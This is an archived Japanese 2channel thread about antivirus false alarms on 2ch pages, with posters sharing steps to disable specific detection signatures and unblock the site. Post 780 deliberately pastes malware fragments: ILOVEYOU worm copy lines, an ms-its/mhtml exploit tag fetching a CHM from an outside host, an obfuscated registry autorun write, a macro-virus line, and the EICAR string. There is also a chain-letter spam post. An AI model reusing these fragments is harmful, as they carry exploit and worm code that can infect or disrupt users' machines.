X



トップページ運用情報
981コメント274KB
ノートン誤作動対策本部
■ このスレッドは過去ログ倉庫に格納されています
0001動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:08:40ID:bR9gbCGm0
詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
0702動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/22(水) 17:43:28ID:w4BbNhMT0
一応書いておいた方がいいかな。OpenJaneにて以下の手順で回避確認。
間違ってたらツッコミよろ。

○NAVを使っていて"このコンピュータに対する侵入 「HTTP MSIE JavaScript OnLoad
Rte CodeExec」 の試みを検出して遮断しました。"というメッセージが出て、
2chに30分間アクセスできなくなった時の対処方法(とりあえず)

1.NAVのオプション→インターネットワーム防止→「除外の設定」で、
「HTTP MSIE JavaScript OnLoad Rte CodeExec」のチェックをはずす
2.「AutoBlockルール」で、2chへの遮断を解除
3.スレを開いてログを取得する
4.専用ブラウザのあぼ〜ん設定で、NGWORDなどを使って、当該レスを表示しないようにする
5.手順1ではずした「除外の設定」のチェックを元に戻しておくのを忘れない
0703動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/22(水) 19:04:03ID:ymCvr6qY0
ノートンの2002はマダ使えるノー。
0704動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/23(木) 04:48:52ID:knzg2z2B0
>>701
ついでにウイルスコードもまとめてあぼ〜ん指定したら
NGワードファイルがノートン先生に吹っ飛ばされますた。
俺バカス(´・ω・`)
0705動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/23(木) 13:53:00ID:anluZr460
これにやられたのかな?
0706ああああああああああああ
垢版 |
2006/03/23(木) 14:13:34ID:8snwN8ut0

キタ━━ <body onload=window()> ━━━ !!
0708動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/23(木) 20:56:17ID:yEL+otgn0
今日から仲間入りしましたNAV2006です。
0712動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/24(金) 09:07:22ID:i9GBvAYP0
>>711
だよねえ。
上の方に「あぼ〜んで対処できた」って書いてあったから試してみたけど、
通信の時点で遮断しちゃうんだからローカルあぼ〜んじゃ
どうにもならないよね。
0718動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/24(金) 18:10:05ID:y5S9pPbQ0
このスレもウイルスがいるようだ。
ノートンが2度発動。しかも最新50で
0720動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/24(金) 21:22:57ID:hZPlzV+H0
誤作動に当たるのかわからんが、ノートン2005入れてて
今まで特に問題も無かったが最近エクセル開こうとしたら
「ウイルスチェックを開始します…」といって全く開けなくなった。
コレはどういうことなんですかね?解決策とかありますか?
0723動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/24(金) 22:40:08ID:AY5Wzasy0
ここは2chのスレを見たらノートンが誤作動する人のスレです
2ch絡みでない誤作動の面倒を見るスレではありません

エクセルでの誤作動報告は当局に対して行ってください
0726動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 15:57:37ID:BZxZKTBW0
>>725
そうなんだよ、それが見つからなくて困ってここに来たよ。
0727動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 16:24:59ID:pwaEyKGo0
>>726
参考までに・・・ただし、自己責任で

ノートンアンチウイルス2006 Ver.1
http://pc8.2ch.net/test/read.cgi/sec/1129452372/996

> まず、オプション→インターネット→インターネットワーム防止→除外の設定で、

> HTTP MSIE JavaScript OnLoad Rte CodeExecのチェックを外す。

> そのあと、オプション→インターネット→インターネットワーム防止→
> AutoBlockルール→現在、AutoBlockで遮断しているコンピュータで、

> 遮断解除してok。で、ok。
0729cen ◆Am9xOgNMYE
垢版 |
2006/03/26(日) 17:19:42ID:Y3ON9q4k0
NAVの場合、こういう方法もあります。onload〜の場合のみ。

1.スレッドを見ると
「「HTTP MSIE Java Script OnLoad Ret CodeExec」の試みを検出して遮断しました。」
という反応をする。

2.Norton AntiVirusのオプションを開いて、インターネットワーム防止を選択、
AutoBlockルールのリストから先程のIPアドレスを消して、閉じる。
インターネットワーム防止をオンにするのチェックを外して無効にする。

3.スレッドを再取得

4.http://www.geocities.jp/cen_hp/program3.html を使って無効化

5.インターネットワーム防止をオンにするのチェックをして有効にする。
0730動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 19:08:48ID:40HZ683F0
>>727
ν速だけ繋がらないから鯖落ちしてんのかと思った
おかげで助かりました
ありがとう
0731動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 19:27:00ID:iC6tWHU/0
馬鹿コードをはれないように2ちゃんのほうでなんとかならないものかな?
うっとうしくってしかたない。
0734動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 19:58:57ID:/R1Hc6p70
ノートンにしなきゃいい
0735動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 20:08:42ID:/R1Hc6p70
フィギュアなんか誰も見ないし、しかも荒川出てないんだし・・・
0736動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 20:11:55ID:/R1Hc6p70
・・・誤爆スマンカッタ
0738動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 00:57:22ID:3I+bmZi80
適当な文字を貼り付けるウイルス?あるじゃん
それで無差別にコード貼りまくられたら流石に2ちゃんも対応するだろ。
分からない人の苦情が殺到して対応に追われるから。
>>167は危機感足りないんじゃ?
0739動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 01:02:58ID:AmYXUlqp0
単なる文字列であって実行ファイルではないのに検知する仕様をどうにかするのと
2ch側の対応、どっちが早いかな。
0740動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 01:21:18ID:NmoRfDPm0
コード貼り付けなんて何年前からあると思ってんの。
今更危機感足りないとか対応とか望んでも無駄でしょう。

無差別に爆撃ってことなら、コード貼り付け関係なくその爆撃自体は対応するでしょうけどね。
0741動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 01:21:46ID:e6NTu7TL0
>>738
今までの対応の仕方をみていて、単なる野次馬の予想ですが。

>適当な文字を貼り付けるウイルス?あるじゃん
これは対応すると思うが(現に今もやっている)

>それで無差別にコード貼りまくられたら流石に2ちゃんも対応するだろ。
>分からない人の苦情が殺到して対応に追われるから
こっちは対応いないんじゃないかな?

現に苦情が殺到中のコメントが>>167だった訳だし。
ノートンを切るか、2chに来ないかと言う答えになると思うよ。
0742動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 02:08:38ID:CRZkjnUj0
ウィルスじゃないものに反応するものとしないもの、選択権はユーザーにあるわけで
シェアをトレンドマイクロに奪われたりすればシマンテックも誤作動対策に着手するかもしれないが
ユーザーに対策を押し付けるような商売してたら淘汰されるのも仕方ないと思う
0744動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 07:09:30ID:GKKli8mx0
何でこのスレはいろいろはってあるのにスレが取得できるの?
0745sage
垢版 |
2006/03/27(月) 07:24:02ID:8a4Se6FG0

出会い系⇔ニューリンク
0747動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
シマンテックの日本支社はおそらく事態を把握してるだろうけど、
エンジンを書き換えるとなると本社の対応が必要なわけで、
「ある一つの掲示板が見られなくなる」ということの重要性が
あっちに伝わらないんだろうと思われ。

1000万人のネットユーザから不買運動されたらさすがに考えると
思うけど、そういう組織だった動きにもなっていないし。

もっとも、Antinny亜種の対応に追われている状況では
2ちゃんに対してあまり好意的にはなれないことも考えられるが。
0748外野ァァン
垢版 |
2006/03/27(月) 12:45:20ID:/XC2wMgb0
> もっとも、Antinny亜種の対応に追われている状況では
> 2ちゃんに対してあまり好意的にはなれないことも考えられるが。

ウィルスがあってこそのアンチウィルスソフトだから、
新種ウィルスの発現はむしろ喜ばしく思ってたりするんじゃないスかね
0749動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 12:49:35ID:rmERapPS0
この期に及んで2ちゃんでの誤作動に対応したら面白いな
仕様変更しない限り対応はしないんじゃねえかなぁ
それともユーザーが束になって苦情入れたら対応するのかな?
0750外野ァァン
垢版 |
2006/03/27(月) 12:50:05ID:/XC2wMgb0
スレ違いの部分にレスをつけてしまった予感
もしくは恋の予感
ごめん
0751動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 15:27:25ID:Jk15jv3kO
2ch対応
これだけで日本での売り上げが伸びるのにな
0754動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 16:34:49ID:6NuGU2zF0
対応する気なんか無いでしょ。
2002のころから、正規ユーザーとしてバージョンアップごとに
シマンテックにはご注進してきたのに、ラブレター文字列すら対応しないんだもの。

今回も、ワーム防止に自分ルール追加しろ、って返事だったよ。
(2chのサーバIPアドレスを信頼するように設定して回避しろと)
0755動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 16:58:55ID:vVYOuf/i0
さぁー回ってきましたっ!
この文を3〜10ヵ所に貼り付け、回してくださいw
これをやった貴方は絶対に夢や学校一のモテ仔に
なりますw
やんなかったら不幸が突撃します
もうココまで読んでしまった人は最低3ヵ所は回さないと絶対不幸が100%突撃して死亡するでしょう
この画像は最低3ヵ所回してから見てください
こちら
3〜10ヵ所って事は3箇所以上だったらなんでもいんですよっ!
やればやるほどし・あ・わ・せ!
これやった人は実際に
両思いになれたり、
学校一のモテ仔になれたり、
夢が叶ったり
欲しい物が手に入ったり。
一気に幸せが手に入ります
だから移せば移すほどお得!
成功した人の名前↓
山田三春
中野 純
その他にもたっくさん叶った人が居ます
だから回してね失敗した人なんて居ません
0756動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 21:38:34ID:hQ0Nj+JU0
http://mickey.mirv.net/2chnis.html
にある対処方法(2chサーバのIPアドレスを除外する)はNISだけなんで、
NAV2005でそれらしい箇所探した。

「オプション」→「インターネットワーム防止」→「一般ルール」→「Default Non-Routable IPs」を「修正」→「処理」タブで「許可」→「コンピュータ」タブの「下のリストにあるコンピュータとサイトのみ」で「追加」→「個別」

のとこにコピペでいいと思う。右クリックで貼り付けがきかなかったので、Ctrl+Vでやった。
0761動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/30(木) 19:46:50ID:+bc29xxf0
さっき先生が誤作動起した。
2ちゃんから攻撃されたので遮断しますたって
なんとか解除したけど
0762動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/31(金) 22:00:47ID:97YYo5Zc0
ノートンのソフト自体の終了方法ってないの?
タスクマネージャ見てもどれがどれだかさっぱり・・・。
0770動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/02(日) 18:17:31ID:LqxABCFV0
今日ノートンが反応してここに誘導してもらって最初から読んでたけど、
NIS入れてないし侵入検知って項目も無いのに…て思ってたらNAVでも反応するのか。
ここまで読むの大変だったけどためになったわ有り難う
0771動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/05(水) 06:28:02ID:L6X4AuEx0
当方マカフィーなのだが、下記のスレを取得しようとすると大激怒されて、
該当datが抹殺されたあげくネットアクセスが遮断されてしまう… orz

【領事館員自殺】中国側、機密を執拗に要求…総領事あての遺書入手(読売新聞)★2
ttp://news19.2ch.net/test/read.cgi/newsplus/1143894478/l50


…時々こういう事が起こるのだが、その都度運営板の
どこぞかの該当スレに通報した方がイイのかしらん?
0774動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
>771-772
マカフィーを窓から投げ捨てろ。
さもなきゃ自分の頭を窓から投げ捨てろ。
0777動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/06(木) 15:48:38ID:ogl3bSVi0
NAVの場合の設定を教えてくれー

インターネットワーム防止で
ナニをシグネチャ除外すれば良いんだ?
0780動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/07(金) 10:26:14ID:9BaGKlIFO
ms-its:mhtml:file://C:\


c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")


<body onload=window()>


c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub


G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WC
0785動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/08(土) 14:52:00ID:0n8hZvPv0
2005でも誤作動するようになったな
専ブラのあぼーんよりも先にノートンがdatに反応するようになったのが原因ぽい
0788動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/09(日) 08:35:16ID:qBdtQITt0
このスレ、更新しようとすると、NISにブロックされて、専ブラのタブが赤くなる。(JaneDoeStyle223)
あぼーんワードはどれですか?

今はNISを無効にしてカキコしています。
0792788
垢版 |
2006/04/10(月) 23:20:01ID:2y1G/tIP0
>>510
>>512
>>517

これらはすべてアボーソしてあります。
NISの設定も変えていませんでした。

>>780-785あたりでJaneDoeStyle223がおかしくなりました。
他スレでは何ともありません。

で、あれからは、ログを取得し直しただけですが、無問題になりました。
いったい何だったんだろう。
ログが壊れただけだったのかな…。

0793動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/12(水) 15:42:54ID:ch5Pl/k40
なんかバスターが2ちゃんのスレをIEで見るとそれだけでウイルス検知するようになったらしいね・・・
先生よりアグレッシブだな
■ このスレッドは過去ログ倉庫に格納されています

ニューススポーツなんでも実況